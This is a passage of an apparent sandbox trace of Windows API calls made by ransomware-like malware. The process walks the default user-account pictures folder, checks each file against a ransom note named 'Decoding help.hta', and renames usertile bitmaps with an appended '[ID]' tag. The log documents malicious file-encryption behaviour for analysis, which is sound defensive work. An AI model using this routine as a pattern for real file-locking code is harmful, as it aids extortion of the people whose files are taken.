pictures\\decoding help.hta")) returned 0x2020 [0053.992] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile25.bmp") returned -1 [0053.992] lstrlenW (lpString="usertile25.bmp") returned 14 [0053.992] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.992] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.992] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile25.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" [0053.992] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" [0053.992] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile25.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.992] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd27f263, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile26.bmp", cAlternateFileName="")) returned 1 [0053.992] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.992] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.992] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.992] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.992] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile26.bmp") returned -1 [0053.992] lstrlenW (lpString="usertile26.bmp") returned 14 [0053.992] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.992] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.992] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile26.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" [0053.992] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" [0053.992] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile26.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.993] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4184d0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4184d0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd2a53c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile27.bmp", cAlternateFileName="")) returned 1 [0053.993] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.993] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.993] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.993] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.993] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile27.bmp") returned -1 [0053.993] lstrlenW (lpString="usertile27.bmp") returned 14 [0053.993] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.994] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.994] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile27.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" [0053.994] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" [0053.994] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.994] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile27.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.994] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43e62d, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae43e62d, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3177db, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile28.bmp", cAlternateFileName="")) returned 1 [0053.994] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.994] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.994] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.994] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.994] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile28.bmp") returned -1 [0053.994] lstrlenW (lpString="usertile28.bmp") returned 14 [0053.994] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.994] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.994] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile28.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" [0053.994] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" [0053.994] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.994] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile28.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.995] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43e62d, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae43e62d, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd33d939, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile29.bmp", cAlternateFileName="")) returned 1 [0053.995] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.995] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.995] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.995] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile29.bmp") returned -1 [0053.995] lstrlenW (lpString="usertile29.bmp") returned 14 [0053.995] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.995] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.995] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile29.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" [0053.995] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" [0053.995] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile29.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.995] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae46478a, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae46478a, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3fc00f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile30.bmp", cAlternateFileName="")) returned 1 [0053.995] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.995] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.995] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.996] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile30.bmp") returned -1 [0053.996] lstrlenW (lpString="usertile30.bmp") returned 14 [0053.996] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.996] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.996] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile30.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" [0053.996] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" [0053.996] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile30.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.996] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae48a8e7, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae48a8e7, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3fc00f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile31.bmp", cAlternateFileName="")) returned 1 [0053.996] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.996] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.997] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.997] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile31.bmp") returned -1 [0053.997] lstrlenW (lpString="usertile31.bmp") returned 14 [0053.997] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.997] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.997] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile31.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" [0053.997] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" [0053.997] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.997] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile31.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.997] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae48a8e7, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae48a8e7, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd42216d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile32.bmp", cAlternateFileName="")) returned 1 [0053.997] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.997] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.997] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.997] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile32.bmp") returned -1 [0053.997] lstrlenW (lpString="usertile32.bmp") returned 14 [0053.997] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default 